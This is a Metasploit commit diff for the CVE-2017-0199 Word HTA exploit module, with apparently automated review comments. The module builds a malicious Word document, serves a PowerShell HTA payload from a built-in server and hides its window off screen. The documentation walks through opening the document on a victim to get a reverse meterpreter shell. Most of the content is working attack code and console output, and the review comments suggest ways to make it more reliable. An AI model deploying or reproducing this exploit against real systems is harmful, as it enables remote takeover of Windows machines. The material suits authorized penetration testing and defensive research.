Use a built-in HTA server and update doc

bug/bundler_fix
wchen-r7 2017-04-24 16:04:27 -05:00
parent 0a085c4e83
commit 6029a9ee2b
2 changed files with 54 additions and 66 deletions

View File

@ -34,74 +34,35 @@ The attack involves a threat actor emailing a Microsoft Word document to a targe
## Verification Steps
1. Start msfconsole
2. Do: ```use exploit/windows/misc/hta_server```
3. Do: ```set URIPATH /cve-2017-0199```
3. Do: ```run```
4. Do: ```use exploit/windows/fileformat/office_word_hta```
5. Do: ```set FILENAME msf.doc```
6. Do: ```set TARGETURI http://xxx.xxx.xxx.xxx:8080/cve-2017-0199```
7. Do: ```exploit -j```
2. Do: ```use exploit/windows/fileformat/office_word_hta```
3. Do: ```set payload [PAYLOAD NAME]```
3. Do: ```exploit```
## Demo
```
msf > use exploit/windows/misc/hta_server
msf exploit(hta_server) > show options
Module options (exploit/windows/misc/hta_server):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Exploit target:
Id Name
-- ----
0 Powershell x86
msf exploit(hta_server) > run
$ msfconsole
msf > use exploit/windows/fileformat/office_word_hta
msf exploit(office_word_hta) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(office_word_hta) > set lhost 192.168.146.1
lhost => 192.168.146.1
msf exploit(office_word_hta) > set srvhost 192.168.146.1
srvhost => 192.168.146.1
msf exploit(office_word_hta) > run
[*] Exploit running as background job.
[*] Started reverse TCP handler on 10.97.100.101:4444
[*] Using URL: http://0.0.0.0:8080/ETTtwiMhS.hta
[*] Local IP: http://10.00.100.101:8080/ETTtwiMhS.hta
[*] Started reverse TCP handler on 192.168.146.1:4444
[+] msf.doc stored at /Users/wchen/.msf4/local/msf.doc
[*] Using URL: http://192.168.146.1:8080/default.hta
[*] Server started.
```
After you have the malicious doc file and servers ready, copy the doc file onto the victim machine,
and open it with Microsoft Office Word. You should receive a session:
```
msf exploit(hta_server) > use exploit/windows/fileformat/office_word_hta
msf exploit(office_word_hta) > show options
Module options (exploit/windows/fileformat/office_word_hta):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME no The file name.
TARGETURI http://example.com/test.rtf yes The path to a online hta file.
Exploit target:
Id Name
-- ----
0 Microsoft Office Word
msf exploit(office_word_hta) > set TARGETURI http://10.97.100.101:8080/ETTtwiMhS.hta
TARGETURI => http://10.00.100.101:8080/ETTtwiMhS.hta
msf exploit(office_word_hta) > set FILENAME msf.doc
FILENAME => msf.doc
msf exploit(office_word_hta) > run
[+] msf.doc stored at /Users/securitytest/.msf4/local/msf.doc
[*] Sending stage (957487 bytes) to 192.168.146.145
[*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.145:50165) at 2017-04-24 16:00:49 -0500
```
Copy /Users/securitytest/.msf4/local/msf.doc into the victim machine, and open it with Microsoft Office Word. A meterpreter will be gained.
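Review bot: the new Verification Steps number both `set payload [PAYLOAD NAME]` and `exploit` as step 3, and they leave out the LHOST and SRVHOST settings that the Demo below actually uses (`set lhost 192.168.146.1`, `set srvhost 192.168.146.1`); with `DisablePayloadHandler` now false the handler needs LHOST, and SRVHOST is the address `generate_uri` embeds in the document, so both belong in the steps. The closing line `Copy /Users/securitytest/.msf4/local/msf.doc into the victim machine...` repeats the instruction already given before the session transcript and names a different home directory than the Demo output (`/Users/wchen/.msf4/local/msf.doc`); drop it or make the path match.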

View File

@ -7,9 +7,10 @@ require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
Rank = ExcellentRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
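Review bot: the rank change from NormalRanking to ExcellentRanking is not mentioned in the commit message and is independent of the built-in server change; either justify it there (a logic bug with no memory corruption arguably qualifies) or split it into its own commit. A one-line comment on include order would also help: `Msf::Exploit::Remote::HttpServer::HTML` is mixed in after `Msf::Exploit::FILEFORMAT`, and the `exploit` method at the bottom of the module depends on `super` resolving to the HTTP server mixin so the listener actually starts.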
@ -31,7 +32,8 @@ class MetasploitModule < Msf::Exploit::Remote
'wdormann',
'DidierStevens',
'vysec',
'Nixawk' # module developer
'Nixawk', # module developer
'sinn3r' # msf module improvement
],
'License' => MSF_LICENSE,
'References' => [
@ -55,20 +57,27 @@ class MetasploitModule < Msf::Exploit::Remote
[
[ 'Microsoft Office Word', {} ]
],
'DefaultOptions' =>
{
'DisablePayloadHandler' => false
},
'DefaultTarget' => 0,
'Privileged' => false,
'DisclosureDate' => 'Apr 14 2017'))
register_options(
[
OptString.new('TARGETURI', [ true, 'The path to a online hta file.', 'http://example.com/test.rtf'])
], self.class)
register_options([
OptString.new('FILENAME', [ true, 'The file name.', 'msf.doc']),
OptString.new('URIPATH', [ true, 'The URI to use for the HTA file', 'default.hta'])
], self.class)
end
def generate_uri
uri_maxlength = 112
uri = datastore['TARGETURI']
host = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST']
scheme = datastore['SSL'] ? 'https' : 'http'
uri = "#{scheme}://#{host}:#{datastore['SRVPORT']}#{'/' + Rex::FileUtils.normalize_unix_path(datastore['URIPATH'])}"
uri = Rex::Text.hexify(Rex::Text.to_unicode(uri))
uri.delete!("\n")
uri.delete!("\\x")
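Review bot: `generate_uri` falls back to `Rex::Socket.source_address` when SRVHOST is `0.0.0.0`, which is the default-route interface and not necessarily one the victim can reach, and that address is baked into the document at generation time; the option description or the doc should say to set SRVHOST explicitly (the demo does). Re-registering URIPATH as a required option with default `default.hta` overrides the HTTP server mixin's optional, randomised URIPATH; a fixed, predictable path is reasonable here because the document must embed it, but a comment saying so would stop the next person from "fixing" it back. `uri_maxlength = 112` is still set above the composed `scheme://host:port/path` string, so whatever limit it enforces now has to accommodate the host and port too, and a long SRVHOST hostname plus URIPATH can hit it where a short TARGETURI did not.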
@ -126,7 +135,25 @@ class MetasploitModule < Msf::Exploit::Remote
data
end
def on_request_uri(cli, req)
p = regenerate_payload(cli)
data = Msf::Util::EXE.to_executable_fmt(
framework,
ARCH_X86,
'win',
p.encoded,
'hta-psh',
{ :arch => ARCH_X86, :platform => 'win' }
)
# This allows the HTA window to be invisible
data.sub!(/\n/, "\nwindow.moveTo -4000, -4000\n")
send_response(cli, data, 'Content-Type' => 'application/hta')
end
def exploit
file_create(create_rtf_format)
super
end
end
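Review bot: `on_request_uri` hardcodes `ARCH_X86` for the hta-psh wrapper in two places while the single target (`[ 'Microsoft Office Word', {} ]`) carries no arch and the payload is unrestricted, so an x64 payload picked by the user would be wrapped as x86; pass the payload's arch (`p.arch`) or pin the target to x86. `data.sub!(/\n/, "\nwindow.moveTo -4000, -4000\n")` assumes the first line of the generated HTA is inside the VBScript block and never checks that the substitution matched; anchor on a specific line of the template instead, or at least fail loudly when `sub!` returns nil, since a template change would silently leave the window visible.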